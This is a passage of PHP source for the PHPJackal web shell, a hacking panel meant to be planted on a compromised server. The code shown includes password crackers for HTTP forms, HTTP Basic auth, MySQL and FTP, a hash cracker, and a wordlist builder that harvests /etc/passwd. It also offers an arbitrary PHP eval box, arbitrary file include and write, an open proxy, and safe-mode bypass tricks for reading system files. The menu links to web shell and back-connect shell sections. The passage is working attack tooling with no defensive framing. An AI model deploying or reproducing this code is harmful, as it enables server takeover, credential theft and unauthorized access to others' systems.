width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>"; } function hashcrackeR(){ global $errorbox,$t,$et,$hcwd; if (!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){ $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ $hash=strtoupper($_REQUEST['hash']); echo "<font color=blue>Cracking " . htmlspecialchars($hash)."...<br>";flusheR(); $type=($_REQUEST['type']=='MD5')?'md5':'sha1'; while(!feof($dictionary)){ $word=trim(fgets($dictionary)," \n\r"); if ($hash==strtoupper(($type($word)))){echo "The answer is $word<br>";break;} } echo "Done!</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } echo "<center>${t}Hash cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Hash:</td><td bgcolor=\"#808080\"><input type=text name=hash size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Type:</td><td bgcolor=\"#666666\"><select name=type><option selected value=MD5>MD5</option><option value=SHA1>SHA1</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; } function pr0xy(){ global $errorbox,$et,$footer,$hcwd; echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>"; if (!empty($_REQUEST['urL'])){ $dir=""; $u=parse_url($_REQUEST['urL']); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); $url=@fsockopen($host, 80, $errno, $errstr, 12); if(!$url)die("<br>$errorbox Can not connect to host!$et$footer"); fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); while(!feof($url)){ $con = fgets($url); $con = str_replace("href=mailto","HrEf=mailto",$con); $con = str_replace("HREF=mailto","HrEf=mailto",$con); $con = str_replace("href=\"mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); $con = str_replace("href=\'mailto","HrEf=\"mailto",$con); $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); echo $con; } fclose($url); } } function mysqlclienT(){ global $t,$errorbox,$et,$hcwd; if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; $link = @mysql_connect($server,$user,$pass); if($link){ if (!empty($db))mysql_select_db($db); $result=mysql_query($query,$link); echo "${t}Query result(s):$et"; echo "<font color=blue><pre>"; while($data=mysql_fetch_row($result)){ foreach($data as $v) { echo $v; echo "\t"; } echo "\n"; } echo "</pre></font>"; mysql_close($link); } else{ echo "$errorbox Login failed!$et<br>"; } } echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>"; } function phpevaL(){ global $t,$hcwd; if (!empty($_REQUEST['code'])){ echo "<center><textarea rows=\"10\" cols=\"64\">"; $code = str_replace("<?php","",$_REQUEST['code']); $code = str_replace("<?","",$code); $code = str_replace("?>","",$code); htmlspecialchars(eval($code)); echo "</textarea></center><br>"; } echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>"; } function whoiS(){ global $t,$hcwd; if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ $server =$_REQUEST['server']; $domain=$_REQUEST['domain']."\r\n"; $ser=fsockopen($server,43,$en,$es,5); fputs($ser,$domain); echo "<pre>"; while(!feof($ser))echo fgets($ser); echo "</pre>"; fclose($ser); } else{ echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>"; } } function hexvieW(){ if (!empty($_REQUEST['filE'])){ $f = $_REQUEST['filE']; echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>"; $file = fopen($f,"r"); $i= -1; while (!feof($file)) { $ln=''; $i++; echo "<tr><td width=\"10%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>"; echo "<td width=\"25%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">"; for ($j=0;$j<=7;$j++){ if (!feof($file)){ $tmp = strtoupper(dechex(ord(fgetc($file)))); if (strlen($tmp)==1) $tmp = "0".$tmp; echo $tmp." "; $ln.=$tmp; } } echo "</td><td width=\"25%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">"; for ($j=7;$j<=14;$j++){ if (!feof($file)){ $tmp = strtoupper(dechex(ord(fgetc($file)))); if (strlen($tmp)==1) $tmp = "0".$tmp; echo $tmp." "; $ln.=$tmp; } } echo "</td><td width=\"40%\" bgcolor=\"#"; if ($i % 2==0) echo "666666";else echo "808080"; echo "\">"; $n=0;$asc="";$co=0; for ($k=0;$k<=16;$k++){ $co=hexdec(substr($ln,$n,2)); if (($co<=31)||(($co>=127)&&($co<=160)))$co=46; $asc.= chr($co); $n+=2; } echo htmlspecialchars($asc); echo "</td></tr>"; } } fclose($file); echo "</table>"; } function safemodE(){ global $windows,$t,$hcwd; if (!empty($_REQUEST['file'])){ $i=1; echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n"; ini_restore("safe_mode");ini_restore("open_basedir"); $tmp = file_get_contents($_REQUEST['file']); echo $tmp; $i++; echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n"; $tmp=tempnam("","cx"); copy("compress.zlib://".$_REQUEST['file'], $tmp); $fh = fopen($tmp, "r"); $data = fread($fh, filesize($tmp)); fclose($fh); echo $data; $i++; if(function_exists("curl_init")){ echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n"; $fh = @curl_init("file://".$_REQUEST['file'].""); $tmp = @curl_exec($fh); echo $tmp; $i++; echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n"; $i++; if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR)) $ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__); else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); } if($_REQUEST['file'] == "/etc/passwd"){ echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n"; for($uid=0;$uid<99999;$uid++){ $h=posix_getpwuid($uid); if (!empty($h))foreach($h as $v)echo "$v:";}} $i++; echo "</pre></font>"; } echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>"; } function crackeR(){ global $et; $cwd = getcwd(); echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>"; } function dicmakeR(){ global $errorbox,$windows,$footer,$t,$et,$hcwd; if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ $min = $_REQUEST['min']; $max = $_REQUEST['max']; if($max<$min)die($errorbox ."Bad input!$et". $footer); $s =$w=""; $out = $_REQUEST['output']; $r = ($_REQUEST['range']=='a' )?'a':'A'; if ($_REQUEST['range']==0) $r=0; for($i=0;$i<$min;$i++) $s.=$r; $dic = fopen($out,'a'); if(is_nan($r)){ while(strlen($s)<=$max){ $w = $s; if($combo)$w="$w:$w"; fwrite($dic,$w."\n"); $s++;} } else{ while(strlen($w)<=$max){ $w =(string)str_repeat("0",($min - strlen($s))).$s; if($combo)$w="$w:$w"; fwrite($dic,$w."\n"); $s++;} } fclose($dic); echo "<font color=blue>Done</font>"; } if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ $input=fopen($_REQUEST['input'],'r'); if (!$input){ if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; else{ $input=explode("\n",shelL("cat $input")); $output=fopen($_REQUEST['output'],'w'); if ($output){ foreach ($input as $in){ $user = $in; $user = trim(fgets($in)," \n\r"); if (!strstr($user,":"))continue; $user=substr($user,0,(strpos($user,':'))); if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo "<font color=blue>Done</font>"; } } } else{ $output=fopen($_REQUEST['output'],'w'); if ($output){ while (!feof($input)){ $user = trim(fgets($input)," \n\r"); if (!strstr($user,":"))continue; $user=substr($user,0,(strpos($user,':'))); if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); } fclose($input);fclose($output); echo "<font color=blue>Done</font>"; } else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; } }elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ $res=downloadiT($_REQUEST['url'],$_REQUEST['output']); if($combo && $res){ $file=file($_REQUEST['output']); $output=fopen($_REQUEST['output'],'w'); foreach ($file as $v)fwrite($output,"$v:$v\n"); fclose($output); } echo "<font color=blue>Done</font>"; }else{ $temp=whereistmP(); echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";} } function calC(){ global $t,$et,$hcwd; $fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode'); if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">"; if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i}))); echo "</textarea>$et</center><br>"; } echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>"; } function authcrackeR(){ global $errorbox,$et,$t,$crack,$hcwd; if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $data=''; $method=($_REQUEST['method'])?'POST':'GET'; if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} spliturL($_REQUEST['target'],$host,$page); $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if($method='GET')$page.=$data; $dictionary=fopen($_REQUEST['dictionary'],'r'); echo "<font color=blue>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $so=fsockopen($host,80,$en,$es,5); if(!$so){echo "$errorbox Can not connect to host$et";break;} else{ $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); $packet.="\r\n\r\n"; $packet.=$data; fputs($so,$packet); $res=substr(fgets($so),9,2); fclose($so); if($res=='20')echo "U: $user P: $pass</br>"; flusheR(); } } echo "Done!</font>"; }else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; } function sqlcrackeR(){ global $errorbox,$t,$et,$crack; if (!function_exists("mysql_connect")){ echo "$errorbox Server does n`t support MySQL$et"; } else{ if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $sql=@mysql_connect($target,$user,$pass); if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else{ echo "<center>${t}MySQL cracker:$crack"; } } } function ftpcrackeR(){ global $errorbox,$t,$et,$crack; if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; else{ if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;} ftp_close($ftp); flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } } else echo "<center>${t}FTP cracker:$crack"; }} function openiT($name){ $ext=strtolower(substr($name,strrpos($name,'.')+1)); $src=array('php','php3','php4','phps','phtml','phtm','inc'); if(in_array($ext,$src))highlight_file($name); else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>"; } function logouT(){ setcookie('passw','',time()-10000); header('Location: '.hlinK()); } ?> <html> <head> <style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> <meta http-equiv="Content-Language" content="en-us"> <title>PHPJackal</title> </head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> <tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table> <hr size=1 noshade> <?php if (!empty($_REQUEST['seC'])){ switch($_REQUEST['seC']){ case 'fm':filemanager();break; case 'sc':scanneR();break; case 'phpinfo': phpinfo();break; case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']); if (!empty($_REQUEST['Save'])){ $filehandle= fopen($_REQUEST['file'],"w"); fwrite($filehandle,$_REQUEST['edited']); fclose($filehandle);} if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR(''); break; case 'openit':openiT($_REQUEST['namE']);break; case 'cr': crackeR();break; case 'dic':dicmakeR();break; case 'whois':whoiS();break; case 'hex':hexvieW();break; case 'img':showimagE($_REQUEST['filE']);break; case 'inc':include ($_REQUEST['filE']);break; case 'hc':hashcrackeR();break; case 'fcr':formcrackeR();break; case 'snmp':snmpcrackeR();break; case 'sql':sqlcrackeR();break; case 'auth':authcrackeR();break; case 'pop3':pop3crackeR();break; case 'imap':imapcrackeR();break; case 'smtp':smtpcrackeR();break; case 'ftp':ftpcrackeR();break; case 'eval':phpevaL();break; 